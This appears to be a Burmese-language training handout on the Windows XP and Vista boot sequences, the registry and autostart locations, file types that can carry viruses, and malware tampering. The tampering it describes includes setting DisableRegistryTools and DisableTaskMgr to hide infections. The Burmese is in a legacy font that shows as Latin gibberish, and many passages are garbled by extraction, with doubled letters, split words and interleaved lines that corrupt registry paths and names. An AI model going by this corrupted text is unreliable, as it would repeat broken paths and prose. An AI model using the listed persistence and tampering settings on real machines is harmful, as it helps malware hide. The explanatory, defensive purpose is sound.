wcgwnf;yg0ifavonf/ yHk(9)/ boot.ini wGif Windows rsm;tm; Install vkyfxm;onfhae&mrsm;udk
azmfjyxm;NyD; tu,fí Windows wpfckxufydkcJhvQif ntldr utoHk;jyKEdkifonfh Windows pm&if;udk
jyornfjzpfonf/ boot.ini udkjyifcsifvQif bootcfg command (odkY) System Configuration Utility
(msconfig.exe) udkoHk;í jyifqifEkdifygonf/ ntldr u DOS (odkY) NT Version r[kwfaom Windows
rsm;udk Boot vkyfEdkifaomfvnf; boot.ini wGif Boot Option rsm;tm; xnfhoGif;Ekdifjcif; r&Sdyg/
nals V 1.0 - rhythm

yHk(9) Syystem Configuration Uttility (mscon

nfig.exe)
5/ ntldr u Boot Mennu udkjycsdefwG
wGif F8 udkESdyyffvQif Advannced Boot Menu
M wpfckay:vmyg
a
rnf/ yHk(10)/ xdk Menu
M wGif Safe
S Mode taejzif
t h Booot vkyf&ef? aemufqHk;toHt k;jyKcJhon
nfh Driver
rsm;ESifh Boot
B vkyf&efponfh tq qifhjrifhaom a½G;cs,frIrsm; yg0ifavonf
v / tu u,fí Boot Menu rS
MS-DOS S? Windows 98 (odkY) Wiindows Me uduka½G;cs,fcJhvQ
v if ,cif O OS u Installl vkyfxm;oonfh Boot
Sector rS rodrf;qnf;xm;aom
x Coopy (bootsect.dos) wpfcktm; ntldrr rSzwfavo onf/ MS-D DOS (odkY)
Windowss 98 \ Boo ot Process o
onf þae&mmrSpwifavo onf/
yHk(10)
1 Window
ws Advanced
d Option M
Menu
6/ ws NT? Wiindows 20000 ESifh Winddows XP t
Window twGufrl ntldr u ntdeetect.com
y½dk*&rfu
uddk vkyfaqmifonf/ ntddetect.com u Install v vkyfxm;onfh Hardware rsm;ESifhywfo oufonfh
tcsuftvuf
t rsm;udk pkaqmif;onf o / ¤if;onf o tcsdKU H Hardware rsm;ud
r k udk,wkf difpHkprf;NyD; tcsdKUudk
BIOS u Memory xJ xwGifcsefxmm;cJhonfh Taable rsm;rS&,l
,jcif;jzpfonf
n/ tu,fí Hardwarre Profile

rsm;pGmudk ul;wifrnfqdkvQif xdktcsdefwGif ntldr u&yfwefYapNyD; Hardware Profiles/Configuration
Recovery Menu udkjyornfjzpfygonf/ ntldr upHkprf;vdkY&onfh tcsuftvufrsm;udk Windows
Registry \ HKLM\Hardware\Description Key wGifodrf;qnf;avonf/ xdkYaemuf ntldr u
System32 folder xJrS ntoskernel.exe ESifh hal.dll zdkifrsm;udk &SmazGavonf/ xdkzdkifESpfzdkifu Windows
Kernel udkjzpfay:aponf/ tu,fí xdkzdkifrsm; aysmufaecJhvQif ]Windows could not start because
the following file was missing or corrupt} [laompmwef;ay:vmrnfjzpfonf/
Windows NT Kernel
7/ Windows NT? Windows 2000 ESifh Windows XP wdkYonf Kernel (ntoskernel.exe) wpfck
ay:wGif tajccHxm;jcif;jzpfNyD; xdk Kernel u Hardware rsm;udk&,ljcif;? Process rsm;udk pwifjcif;^
&yfwefYjcif;? CPU udkxdef;csKyfjcif;? Memory udkpDrHcefYcGJjcif;wdkYudk vkyfaqmifay;aeonfh tajccHtus
qHk; Service wpfckjzpfonf/ Motherboard ESifh CPU 'DZdkif;rsm;Mum;jcm;em;rIudk udkifwG,fonfrSm Kernel
\ Hardware Abstraction Layer (HAL) jzpfNyD; Kernel ESifh ¤if;xufwpfqifhjrifhonfh Windows
wdkYtwGuf Hardware rsm;udk pDrHcefYcGJonfh Function rsm;udk aqmif½Gufonf/ omrefuGefysLwmwpfvHk;
twGuf HAL zdkifonf hal.dll jzpfonf/ (Physical Address Extension (PAE) udktoHk;jyKonfhpepfrsm;
twGuf Kernel Image onf ntoskrnl.exe tpm; ntoskrnlpa.exe jzpfavonf/)
8/ NT Kernel onf trSefpifppfwGif Windows r[kwfay/ Graphical User Interface (GUI)
ESifh Windows onf Kernel txufwGif&SdNyD; ¤if;udktaumiftxnfazmfaeonfrSm 32-bits Windows
(Win32) Subsystem jzpfonf/ NT Kernel udk UNIX ESifh OS/2 wdkYuvnf; toHk;jyKEkdifygonf/ Kernel
ESifh HAL udk Memory xJul;wifNyD;onfhaemufwGif ntldr onf Registry xJrS Component zdkifrsm;udk
&SmazGNyD;ul;wifygonf/ ntldr onf Boot Menu wGif Boot vkyfcJhonfhtaetxm;ay:rlwnfNyD;
HKEY_LOCAL_MACHINE\System\Select\Current (odkY) HKEY_LOCAL\MACHINE\System\
Select\LastKnownGood Value udk&SmazGppfaq;NyD; HKEY_LOCAL_MACHINE\System\Current
ControlSet key udkzefwD;avonf/ xdkYaemuf Hardware Profile rsm;pGm&SdcJhvQif HKEY_LOCAL_
MACHINE\System\CurrentControlSet\Hardware Profiles key udkppfaq;avonf/
9/ Hardware Profile rsm;udkppfaq;NyD;onfhaemufwGif ntldr onf HKEY_LOCAL_
MACHINE\System\CurrentControlSet\Services \ Entry Key rsm;atmuf&Sd Type Value onf 1
[kwf? r[kwf pHkprf;NyD; 1 jzpfcJhvQif ¤if;onf Kernel tqifh Device Driver jzpfaMumif;jyonf/ Boot
vkyfcsdefwGif pwif&ef trSwftom;jyKxm;onfh Driver rsm;udk ntldr uul;wifavonf/ xdktcsdefwGif
Windows Kernel \u@onf NyD;qHk;NyDjzpfonf/
10/ Kernel u ueOD;vkyfaqmifonfh u@ESpfck&Sdonf/ yxru@onf tenf;qHk;vdktyf
onfh Service rsm;udk pwifvkyfaqmifavonf/ xdk Service rsm;rSm HAL? Memory Manager? Object
Manager? Security Reference Manager ESifh Process Manager wdkYjzpfonf/ xdktcsdeftxd uGefysLwm
zefom;jyifwGif jrif&EkdifonfrSm BIOS rS Graphic Mode 0ifvmonftxd pmom;csnf;oufoufESifh
Windows pwifonfh Progress Bar omjzpfavonf/ xdkYaemuf System tm;vHk;udk jyefvnfppfaq;NyD;
Startup Process udk pwifavonf/ Device Driver rsm;ESifh Filter Driver rsm;udk ul;wif&rnfh
tpDtpOftwkdif; ul;wifNyD; System Manager Subsystem (SMSS) pwifonf/
11/ Boot vkyfcsdefwGif SMSS onf atmufygwdkYudk vkyfaqmifavonf-
nals V 1.0 - rhythm

(u) HKLM\SYS
H STEM\CurreentControlSeet\ Control\ Session Maanager\ Envvironment
K atmuf
Key ufwGif Enviroonment Variaable rsm;udk zzefwD;onf/
( c) SMSS u Win32
W Subsyystem (win322k.sys) \ K
Kernel-mode Side udkpwifonf/
( *) Win32 Subssystem \ User-mode
W U S
Side jzpfaom
o Client/Seerver Runtim
me Server
Subsystem (csrss.exe)
( ukpwifonf/ xdktcsdefwG
ud wif Window Screen udk
ws Startup S
jrif&NyDjzpfo
onf/
(C) mory Page zif
Virtual Mem
V zdk rsm;udk zefwD;onf/ (HKLM\SYS
H TEM\CurrenntControl
Set\Control\\Session Mannager\Memoory Managem ment)
rSwfcsuf
uf/ smss.exe onf zdkifrsm;udkrzGifhciwG if if Autochhk udkvkyfaqmif
q NyD; Winndows udk
pepfwusyd
u wfcJhjcif; &Sd^r&Sd ppfaq;N
a yD; Drivve rsm;tm;v vHk;udk ppfaq;onf
q / Drivve rsm;udk
ppfaq;&mwGif chkkdsk.exe udkvkyfaqmifaapNyD; rppfaq;vd a kygu 10puúefYtwG
wif; ESpf
ouf&m Key wpfckESESdyfNyD; ausmfEdEdkifygonf/
12/ aemufqH
qk;wGif Winndows Logoon Manager jzpfonfh w winlogon.ex xe pwifvky
yaqmif
f NyD;
Welcomee Screen (od
oYkY) Logon Diaalog udkjyorrnfjzpfonf/ yHk(11)/
yHk(111) Logon Dialog

Window
ws Logon Process (Winllogon)
13/ Winlogoon u Loccal Security Authority Subsystem Service (L LSASS) ESifh Service
Control Manager (S SCM) udkpwif
w apNyD; Windows
W Seervice wGif Automatic [ka½G;cs,fxm;onfh
Service rsm;tm;vH
r k;udk vkyfaqmififonf/ Logoon Process onf
o atmuf ufygtwkdif; jzpf
jz onf-
(u) W
Winlogon u Graphical Identificatioon and Authhentication ud
ukac:,lonf/
( c) Logon Prom
L mpt udk GIN
NA ujyoNNyD; toHk;jyKo ollu Secure Attention SSequence
(
(Control A + Delete)) udkESdyfonf/ (Windows Server 2000
+ Alt 0/2003/20088)
( *) L
Logon Dialoog udk GINA
A ujyoonf
nf/
(C) C
Credential r kufxnfh&onf/ (User Name? Paassword ESifh Domain)
rsm;½d D
( i) G
GINA u Winlogon
W qD Credential rrsm;jyefydkYonf
n/
nals V 1.0 - rhythm

( p) W
WinLogon u LSASS qD q Credential rsm;ydkYNyD; rnf
r onfh Acccount Databbase tm;
oHk;rnfudk qHqk;jzwfonf/ (Account Databse rsmm;rSm Local SAM S ? Domaain SAM
ESifh Active Directory
D wdkYjzpfonf/)
(q) LSASS
L u User Perm mission rsm;u udkppfaq;jcifif;? Audit Trrail rsm;zefw
wD;jcif;ESifh
Security Tokken rsm;jyKvk
vkyfjcif;jzifh Loocal Securityy Policy rsm;;owfrSwfonf/
14/ wmoHk;pGJolrS atmifjrifpGm Login vkyfNyD;onfhaemmufwGif Winlogon u aatmufyg
uGefysLw
qmif½Gufonf-
wdkYudk aq
(u) Control
C Set rsm;udk Upddate vkyfonf n/ LastKnoownGood Coontrol Set udk Update
jyefvkyfonf/
( c) Document
D a Settings atmuf&Sd User
and U Profile (ntuser.dat) rsm;tm; ul;wifvkyf
aqmifonf/
( *) User
U ESifh uGef eysLwm\ Group
G Policyy Setting rsm;;tm; toHk;jyKonf/
(C) HKLM\
H Sofftware\ Microsoft\ Winndows NT\ CurrentVers
C sion\IniFileM
Mapping\
system.ini\BBoot wGif&Sdonf
o h Shell Vaalue (REG_SSZ) uñTef;aom a Shell yy½dk*&rfudk
vkyfaqmifo onf/ yHkrSeftm;j
t zifh xdkwefzdk;rSm SYS:Microsoft\W Windows NT T\Current
V
Version\Win nlogon jzpNpf yD; HKLM M\Software\M Microsoft\WWindows NT T\Current
V
Version\Win nlogon wGifowf
o rSwfxm;onf m h vkyfaqmif
a csufrsm;udkvkyfaqmif
q onf/
þae&mwGifif toHk;jyKonfh Shell y½d½*&rf k onf exxplorer.exe jzpfonf/ yHk((12)/
yHk(12) Registry wGif Winlogoon twGuf owf

o rSwfxmm;aom Setting rsm;
15/ xdkYaemu
uf atmufygae&mrsm;wG
yg wGif owfrSwf
wfxm;aom y½kd*&rfrsm;u
udk vkyfaqmmifrnfjzpf
onf-
(u) H
HKLM\SOF
FTWARE\M
Microsoft\Winndows\CurreentVersion\R
RunOnce
( c) HKLM\SOF
H FTWARE\M
Microsoft\Winndows\CurreentVersion\P
Policies\Expplorer\
R
Run
( *) H
HKLM\SOF
FTWARE\M
Microsoft\Winndows\CurreentVersion\R
Run
(C) H
HKCU\Softw
ware\Microssoft\Window Windows\Load
ws NT\CurreentVersion\W
( i) H
HKCU\Softw
ware\Microssoft\Window
ws NT\CurreentVersion\W
Windows\Ruun
( p) H
HKCU\Softw
ware\Microssoft\Window
ws\CurrentVersion\Run

(q) HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
( Z) %ALLUSERSPROFILE%\ Start Menu\ Programs\ Startup\ (Vista rwdkifcif
Windows rsm;wGif toHk;jyKonf/)
(ps) %USERPROFILE%\Start Menu\Programs\Startup\ (Vista rwdkifcif Windows
rsm;wGif toHk;jyKonf/)
Windows Vista Startup Process
16/ Windows Vista? Windows Server 2008/2012 ESifh Windows 7/8 wdkYrS Boot vkyfonfh
jzpfpOfonf NT Kernel udktoHk;jyKonfh rnfonfh Windows ta[mif;rsm;ESifhrqdk uGJjym;jcm;em;onf/
yxrqHk;taejzifh uGefysLwmudk pzGifhonfhtcsdefwGif BIOS (odkY) EFI udk ul;wifavonf/ BIOS
pepfwGif Boot Sector u MBR udk&,lNyD; Windows Boot Manager (BOOTMGR) udk ul;wifonf/
BOOTMGR u Active Partition wpfckudk yxrqHk;&SmazGNyD; Windows udkac:,loHk;pGJ&ef Boot
Configuration Data (BCD) Folder xJwGifodrf;xm;onfh tcsuftvufrsm;udk toHk;jyKonf/ (EFI
pepfwGif Windows Boot Manager onf EFI Partition wGifodrf;qnf;xm;aom EFI Application
jzpfonf/)
17/ BOOTMGR u Boot Configuration Data rsm;udkzwfNyD; OS a½G;cs,fEdkifonfh Menu
udkjyoavonf/ Windows NT rsm;ESifhrwlonfhtcsufrSm tao;pdwf Boot Menu udka½G;cs,f&ef F8
Key tpm; Space Bar udkESdyf&jcif;jzpfonf/ Boot Configuration Data (BCD) qdkonfrSm Boot
vkyfonfhtcsdef toHk;jyKrnfhtcsuftvufrsm;wGuf Firmware udkrrSDcdkonfh Database wpfckjzpfonf/
BCD onf ntldr utoHk;jyKonfh boot.ini udk tpm;xdk;&efjzpfNyD; ¤if;udk BOOTMGR utoHk;jyKjcif;
jzpfonf/ BCD tm;ajymif;vJvdkvQif Command-line Tool wpfckjzpfaom bcdedit.exe udktoHk;jyK&
rnfjzpfonf/ BCD wGif BOOTMGR uazmfjyaom Menu rsm;yg0ifNyD; xkd Menu rsm;rSm atmufyg
twkdif;jzpfonf-
(u) Windows Vista udk winload.exe uac:oHk;NyD; Boot vkyfí&aprnfh a½G;cs,frI/
( c) Hibernate vkyfxm;aom Windows Vista udk winresume.exe uac:,ltoHk;jyKEkdif
aprnfh a½G;cs,frI/
( *) Windows NT uJhodkY Windows ta[mif;rsm;udk ntldr jzifhac:,ltoHk;jyKí&ap
Ekdifaom a½G;cs,frI/
(C) Volume Boot Record udk ul;wif&efESifh vkyfaqmifap&ef a½G;cs,frI/
18/ BCD udk EasyBCD uJhodkY Third-party Tool oHk;NyD; tvG,fwuljyKjyifEkdifavonf/
BOOTMGR u OS Boot Loader jzpfaom Winload.exe udkac:oHk;NyD; OS Kernel (ntoskrnl.exe) ESifh
Device Driver rsm;udk ul;wiftvkyfvkyfaponf/ Winload.exe onf ntldr ESifhoabmobm0csif;
qifwlonf/
owdxm;oifhaom zdkiftrsdK;tpm;rsm;
19/ uGefysLwmpepfwGif tcsdKUaomzdkiftrsdK;tpm;rsm;wGif uGefysLwmwGif tvkyfvkyfapEkdif
aomuk'frsm;? Batch Command rsm;? Script rsm;? Macro rsm;yg&SdonfhtwGuf xdkzdkifrsm;tm; Adkif;&yfpf

rsm;u uk'frsm;aygif;xnfhjcif;? jyifjcif;rsm; jyKvkyfum ul;pufysHUyGm;Ekdifygonf/ atmufygzdkiftrsdK;
tpm;rsm;onf Adkif;&yfpfrsm; ul;pufwkdufcdkufEkdifonfhtwGuf txl;owdjyK&rnfh zdkifrsm;jzpfavonf-
(u) .386/ Windows Enhanced Mode Driver jzpfonf/ þzdkifonf Executable uk'f
jzpfí Adkif;&yfpful;pufcH&Edkifonf/
( c) .ADE/ Microsoft Access Project/ Macro rsm;toHk;jyKjcif;u tm;enf;csufudk
jzpfaponf/
( *) .ADP/ Microsoft Access Project/ Macro rsm;toHk;jyKjcif;u tm;enf;csufudk
jzpfaponf/
( C) .ADT/ Microsoft Access Project/ Macro rsm;toHk;jyKjcif;u tm;enf;csufudk
jzpfaponf/
( i) .APP/ Application zdkif/ Application zdkifrsm;jzpfojzifh Executable uk'frsm; yg0if
onf/
( p) .ASP/ Active Server Page/ þtrsdK;tpm;zdkifrsm;onf y½dk*&rfESifh HTML uk'f
rsm;aygif;pyfxm;jcif;jzpfonf/
(q) .BAS/ Microsoft Visual Basic Class Module/ ¤if;wdkYonf y½dk*&rfrsm;jzpfaom
aMumifh Executable uk'frsm;yg0ifonf/
( Z) .BAT/ Batch zdkif/ ¤if;wdkYonf pmom;zdkifrsm;jzpfNyD; pepfESifhywfoufaom
Command rsm; yg0ifonf/ zdkifAdkif;&yfpftcsdKU&Sdaomfvnf; ¤if;wdkYonf awGYaeus
Adkif;&yfpfrsm; r[kwfMuay/
(ps) .BIN/ Binary zdkif/ ¤if;wdkYonf y½dk*&rfwpfckckESifhwGJzufNyD; vkyfief;rsdK;pHk vkyf
Muonf/
(n) .BTM/ 4DOS Batch To Memory Batch zdkif/ Batch zdkiftrsdK;tpm;aemufwpfck
jzpfonf/
( #) .CHM/ Compiled HTML Help zdik f/ Script rsm;toHk;jyKjcif;u tm;enf;csufudk
jzpfaponf/
( X) .CLA/CLASS/ Java Class zdkif/ Java Applet rsm;onf Sandbox wGif tvkyfvkyf
onfhtwGuf pepfrS oD;jcm;z,fcGmaeonf[k ,lqaeMuonf/ rnfokdYqdkap
Applet wpfckonf Sandbox wGifvHkNcHKpdwfcspGm tvkyfvkyfaeonf[k uGefysLwm
toHk;jyKoltm; vSnfhpm;Ekdifygonf/
( !) .CMD/ Windows NT Command Script/ NT \ Batch zdkifrsm;jzpfygonf/
( c) .COM/ Command (Executable zdkif)/ rnfonfh Executable zdkifrqdk ul;pufcH&
Edkifonf/
(P) .CPL/ Control Panel Extension/ Device Driver rsm;ESifhqifwlonf/ xdkYaMumifh
¤if;wdkYwGif Executable uk'frsm;yg&Sdonf/

(w) .CRT/ Security Certificate/ þzdkiftrsdK;tpm;wGif ¤if;wdkYESifhwGJzufxm;aomuk'f
rsm;yg&SdEkdifonf/
(x) .CSC/ Core Script zdkif/ Script zdkiftrsdK;tpm;jzpfí Executable uk'frsm;yg&Sdonf/
( ') .CSS/ Hypertext Cascading Style Sheet/ Style Sheet rsm;wGif Executable uk'f
rsm;ygEkdifonf/
( ") .DLL/ Dynamic Link Library/ DLL rsm;wGif tjcm; Application rsm;qD Export
vkyfEdkifaomuk'frsm;? Function rsm;yg&Sdavonf/
( e) .DOC/ Microsoft Word Document/ Word Document rsm;wGif Macro rsm;yg&SdEkdif
NyD; ¤if;wdkYonf Executable uk'f\ ao;i,faomtydkif;rsm;jzpfMuonf/ Adkif;&yfpf
awmfawmfrsm;rsm;onf Macro rsm;udk ypfrSwfxm;Muonf/
( y) .DOT/ Microsoft Word Document Template/ Word Template wGifvnf; Macro
rsm;yg&SdEkdifonf/
( z) .DRV/ Device Driver/ Device Driver onf Executable uk'fjzpfonf/
( A) .EML/EMAIL/ MS Outlook Express E-mail/ Email Message rsm;wGif HTML
ESifh Script rsm;yg&SdEkdifonf/ ajrmufrsm;pGmaom Adkif;&yfpfESifh Worm wdkYonf þ
zkdiftrsdK;tpm;udk ypfrSwfxm;Muaovnf/
(b) .EXE/ Executable zdkif/ rnfonfh Executable zdkifudkrqdk ul;pufEkdifonf/
( r) .FON/ Font/ Font zdkifwGif Executable uk'frsm; yg&SdEkdifonf/
(,) .HLP/ Help zdkif/ Help zdkifrsm;wGif Macro rsm;yg&SdEkdifonf/
( &) .HTA/ HTML Program/ þzdkiftrsdK;tpm;wGif Script rsm;yg&SdEkdifonf/
(v) .HTM/HTML/ Hypertext Markup Language/ HTML zdkifrsm;wGif Script rsm;
yg&SdEkdifonf/
( 0) .INF/ Setup Information/ rxifrSwfaomt&mrsm;jyKvkyf&ef Setup Script rsm;udk
ajymif;vJEkdifonf/
(o) .INI/ Initialization zdkif/ þzdkiftrsdK;tpm;wGif y½dk*&rfa½G;cs,frIrsm; yg&Sdonf/
([) .INS/ Internet Naming Service/ DNS tcsuftvufrsm;udk ajymif;vJ&ef þ
zdkifrsm;udk ajymif;vJEkdifygonf/
( V) .ISP/ Internet Communication Settings/ IIS twGuf Connection Setting rsm;
yg0ifonf/ Web Server Function rsm;udkajymif;vJ&eftwGuf Setting rsm;udk
ajymif;vJEdkifonf/
(t) .JS/JSE/ JavaScript/ Script rsm;jzpfaomaMumifh ¤if;wdkYwGif Executable uk'frsm;
yg&Sdonf/
(-) .LIB/ Library/ oDtdk&Dt& þzdkiftrsdK;tpm;rsm;onf ul;pufcH&Edkifonf/ odkY
aomf ,aeYwkdif rnfonfhzdkifrQ ul;pufcH&jcif;r&Sdao;yg/

(-) .LNK/ Link/ ¤if;wdkYonf zdkifrsm;? zdk'grsm;ESifh Application rsm;twGuf Link rsm;
jzpfonf/ Adkif;&yfpfonf tjcm; Link wpfcktjzpfajymif;vJEdkifonf/
(-) .M/ MATLAB/ þzdkifrsm;wGif Executable uk'frsm;yg&Sdonf/ tenf;i,faom
Akdif;&yfpfrsm;om MATLAB zdkifrsm;udk ypfrSwfxm;Muavonf/
(-) .MDB/ Microsoft Access Database/Application/ Access zdkifrsm;wGif Macro rsm;
yg&SdEkdifonf/
(-) .MDE/ Microsoft Access Database/ Macro rsm;ESifh Script rsm;u vHkNcHKa&;tm;
enf;csufrsm;jzpfaponf/
(-) .MHT/MHTM/MHTML/ MHTML Document/ ¤if;onf Web pmrsufESmrsm;
udk pkpnf;xm;jcif;jzpfonf/ Web pmrsufESmrsm;wGif ul;pufcH&Ekdifonfh Script
rsm;yg&Sdonf/
(-) .MP3/ Audio zdkif/ oDcsif;zdkifppfppfrsm;udk ul;pufjcif;r&SdEkdifaomfvnf; .mp3
zdkifrsm;wGif Media Player rsm;uem;vnfNyD; tvkyfvkyfEkdifaom Macro uk'frsm;
yg0ifEkdifonf/
(-) .MSO/ Math Script Object/ Database ESifhqufoG,faomy½dk*&rfzkdifrsm;jzpfí
Executable uk'frsm;yg0ifonf/
(-) .MSC/ Microsoft Common Console Document/ Microsoft Management Console
twGuf Snap-in jzpfonf/ tjcm;aomvkyfaqmifcsufrsm;udk aqmif½Guf&ef zdkifudk
ajymif;vJEdkifonf/
(-) .MSI/ Microsoft Windows Installer Package/ þzdkifrsm;wGif Executable uk'f
rsm;yg&Sdonf/
(-) .MSP/ Microsoft Windows Installer Patch/ þzdkifrsm;wGif Executable uk'frsm;
yg&Sdonf/
(-) .MST/ Microsoft Visual Test Source Files/ rl&if;y½dk*&rfuk'frsm;udk ajymif;vJ
Edkifonf/
(-) .OBJ/ Relocatable Object Code/ þzdkifrsm;onf y½dk*&rfrsdK;pHku toHk;jyKaom
tcsuftvufzdkifrsm;jzpfonf/
(-) .OCX/ Object Linking and Embedding (OLE) Control/ Web pmrsufESmwpfckrS
Download vkyf,lEkdifaom y½dk*&rfrsm;jzpfonf/
(-) .OV?/ Program File Overlay/ y½dk*&rfrsm;qD vkyfaqmifcsufrsm;udk aygif;ay;
rnfh aemufqufwGJzdkifrsm;jzpfonf/ aemufqufwGJzkdifrsm;onf tcsuftvufzdkif
oufouf jzpfEkdifouJhodkY Executable uk'frsm;yg0ifaomzdkifrsm;vnf;jzpfEkdifonf/
(-) .PCD/ Photo CD MS Compiled Script/ Script rsm;onf vHkNcHKrIudk tm;enf;csuf
jzpfaponf/

(-) .PIF/ MS-DOS Shortcut/ Adkif;&yfpfonf Shortcut taejzifh csdwfqufxm;aom
y½dk*&rfudk ajymif;vJEdkifonf/
(-) .PPT/ Microsoft PowerPoing Presentation/ Powerpoint Presentation rsm;wGif
Macro rsm;ygEdkifonf/
(-) .PRC/ Palm Pilot Resource zdkif/ PDA rsm;wGif tvkyfvkyfaom y½dk*&rfrsm;jzpf
onf/
(-) .REG/ Registry Entries/ þzdkifrsm;onf Registry Setting rsm;udkajymif;vJav
onf/
(-) .RTF/ Rich Text Format/ zdkifrsm;onf pmom;rsm;omygaomaMumifh vHkNcHKpdwfcs
&avonf/ odkYaomf zdkifrsm;twGif;wGif Bianry Object rsm;udk iHkxm;Ekdifonf/
(-) .SCR/ Screen Saver/Script/ Screen Saver rsm;ESifh Script rsm;wGif Executable
uk'frsm;ygavonf/
(-) .SCT/ Windows Script Component/ Script rsm;udk ul;pufEdkifonf/
(-) .SHB/SHS/ Shell Scrap Object File/ Scrap zdkifwGif Executable uk'fyg0ifEkdif
onf/
(-) .SMM/ Ami Pro Macro/ ¤if;wdkYonf Macro rsm;jzpfí ul;pufcH&Edkifonf/
(-) SOURCE/ Source Code/ ¤if;wdkYonf uk'fAdkif;&yfpfrsm;u ul;pufapEkdifonfh y½dk
*&rfzdkifrsm;jzpfonf/ zdkif Extension rsm;onf .ASM? .C? .CPP? .PAS ESifh .CS
ponfwdkYjzpfEkdifonf/
(-) .SYS/ System Device Driver/ Device Driver onf Executable uk'fjzpfonf/
(-) .URL/ Internet Shortcut/ r&nf½G,faom Website tm;zGifhMunfhap&ef Adkif;&yfpf
u ajymif;vJEdkifonf/
(-) .VB/VBE/ VBScript zdkif/ Script rsm;udk ul;pufcH&Edkifonf/
(-) .VBS/ Visual Basic Script/ Script zdkifwGif Adkif;&yfpf (odkY) Worm (odkY) Trojan
yg0ifEkdifonf/
(-) .VXD/ Virtual Device Driver/ Device Driver onf Executable uk'fjzpfonf/
(-) .WSC/ Windows Script Component/ Script rsm;udk ul;pufEkdifonf/
(-) .WSF/ Windows Script zdkif/ Script rsm;udk ul;pufEkdifonf/
(-) .WSH/ Windows Script Host Settings File/ rarQmfvifhaomt&mrsm; jyKvkyf&ef
twGuf Akdif;&yfpfonf Setting rsm;udk jyKjyifEkdifonf/
(-) .XL?/ MS Excel zdkif/ Excel Worksheet rsm;wGif Macro rsm;yg0ifEkdifonf/
nals V 1.0 - rhythm

Window
ws Registry
20/ Window ws Registryy qdkonfrmS uGefysLwmmwGif wyfq qifxm;aomm Hardwaree rsm;ESifh
toHk;jyKaaeonfh Deevice Driveer rsm;? Application
A rsm;ESifhywfoufonfh tcsuftv vufrsm;udk
pkpnf;xmm;aomzdkifjzpfpNyD; wnf;jzwfvdkygu regedit.exe zdkifjzifh Registry Database D udkac:,lí
toHk;jyKEkEkdifygonf/ Windows 95 9 rwdkifcif Windows rsm;wGif xk xdduJhodkYwnf;jzwfvkdygu Win.ini?
System.inni ESifh Appllication rsm;ESifh csdwfqufuxm;aom tjcm; .ini zdkifrsm;udk wnf;jzwf&avonf a /
Windowss Registry \ Databasse zdkifrsm;jzpf pfaom DEFFAULT? SA AM? SECUR RITY? SOFTWARE?
SYSTEM M ESifh ntuserr.dat wdkYudk C:\Windowss\System32 Folder atmmufwGifodrf;qnf ; ;NyD; reegedit.exe
rSty rnf r onfhy½dk*&rf* ESifhrQ jy jyifqifodrf;qnf
q ;í r&aay/ tjcm; Third-partty y½dk*&rfw wpfckckESifh
jyifqifv vddkvQif vuf uf&SdtoHk;jyKaeaom
e Winndows onf tvkyfvky yffaeí r&ay/ Registryy Setting
rsm;udk wnf
w ;jzwfjcifif;onf tEÅÅ&m,frsm;on nfhtwGuf rjr yKjyifcif Backup
B vkyfNyD;odrf;qnf
nf;xm;oifh
onf/
21/ Registryy Entry rsm;ud j &eftwGuf Registryy Editor t
m k jyo&efefESifh wnf;jzwf twGif;wGif
Handle Key rsm;&Sdavonf a / ¤if;wdkYrSm HKEY_CLA
H ASSES_ROO OT? HKEY Y_CURRENT T_USER?
HKEY_L LOCAL_MA ACHINE? HKEY_USE ERS ESifh HKEY_CU URRENT_CO ONFIG wdYkjzpfonf/
yHk(13)/
yHk(13) R
Registry ditor twGif;&S
Ed ; d Handle K
Key rsm;
22/ HKEY__CLASSES__ROOT onf o HKEY Y_LOCAL__MACHINE E \tcGJwpf w ckjzpfNyD;
aqmhzf0Jv
vftm;vHk;\ Classes rssm;ESifh Extennsion rsm;ygg0ifonf/ H HKEY_CUR RRENT_USE ER onf
HKEY_U USERS \t tcGJwpfckjzpfpNyD; Window ws \ vuf uf&SduGefysLwmoHk;pGJolESifhywf
woufaomm tao;
pdwftcsuuftvufrsmm;yg&Sdonf/ HKEY_LO OCAL_MAC CHINE wGif pepfESifhywf woufaom Settings
tm;vHk;yg
yg0ifonf/ HKEY_USE
H ERS ü uGefysLwmwG
y if toH
t k;jyKvsufuf&Sdaom uGefeysLwmoHk;pGJolrsm;ESifh
ywfouf
uonfh Settiings rsm;yg&S&Sdonf/ HK KEY_CURR RENT_ CON NFIG onf nf HKEY_LLOCAL_
MACHIN NE tcGJwpfckjzpfNyD; uGefysLwm vu uf&Sdtvkyfvk
vyfaeaom tpDtpOfpepf e rsm;yg&Sdo
onf/ t
ao;pdwfood&Sdem;vnf
nfEkdif&eftwGuf u Registry Setting tcssKd Utm; wifjytyfygonf/
Window ws pepf pwififcsdefwGif y½d½dk*&rfrsm;tmm; tvkyfvkyyffapjcif;
23/ ws pepfwGif Logon pw
Window wifvkyfNyD;aemmuf Welcom me Screen ay:onf
a ESifh Adkif;&yfpf
rsm;onf ¤if;wdkYtm;v
vkyfaqmif&ef & twGuf aee&mwGif ¤if;wdkYwefzdk;rsmm;udk jyifa&;avonf/ yHk(14)wGif
HKEY_L LOCAL_MA ACHINE\SO OFTWARE\M Microsoft\W Windows\CurrrentVersionn\Run atmmufü t
nals V 1.0 - rhythm

vkyfvkyfaaeaom y½dk*&rf
* rsm;udk awG
a YjrifEkdifygonf
g / tuu,fí Run tpm; RunO Once wGif wef
w zdk;rsm;
udkjyifygu
u Windowss pwifcsdefw
wGGif y½dk*&rfonf
o wpfBudrfrom vkyfaq
qmifrnfjzpfygonf/
yHk(14) ndows pwifcsd

Win c efwGif vkyfvkyfonfh y½dk*&rfrsm;;
tv
Registryy Editor ESifh Task Manaager tm; toHk;jyKcGifhr&&atmif wm;;qD;jcif;
t
24/ wpfcgw w&HwGif Adkif;&yf
; pfrsm;onnf Registryy Editor t tm;zGifhír&atmif ydwyfyifjcif;ESifh
Task ta aejzifh ¤if;tvk
t yfvkyfaeonfe udk zkH;uG,f&eftwGuf Task Manager M udac:,l
k toHk;;jyKí r&
atmif w wm;qD;jcif;rssm; jyKvkyfavh
v&Sdygonf/ xdkodkYjyKvkyf&ef
& twGuf yHk(15)wGif awGYjrif&on nfhtwkdif;
HKEY_C CURRENT_ _USER\Softw ware\Microssoft\Window ws\CurrentVeersion\Policiies\System atmuf&Sd
DistableR
RegistryToool ESifh DisableTaskMgr DWORD
D weefzdk;rsm;udk 1 tjzpfjyifavonf
v /
yHk(15) ndows Adkif;&y

Win yfpfjyifqifo
onfh Registrry wefzdk;rsm;
Control Panel rS Fo n tm;azsmuf
older Option ufjcif;
25/ Adkif;&yfpfpfrsm;onf ¤if
¤ ;wdkYtm; &SmazGírawG wGY&SdEdkifap&eftwG
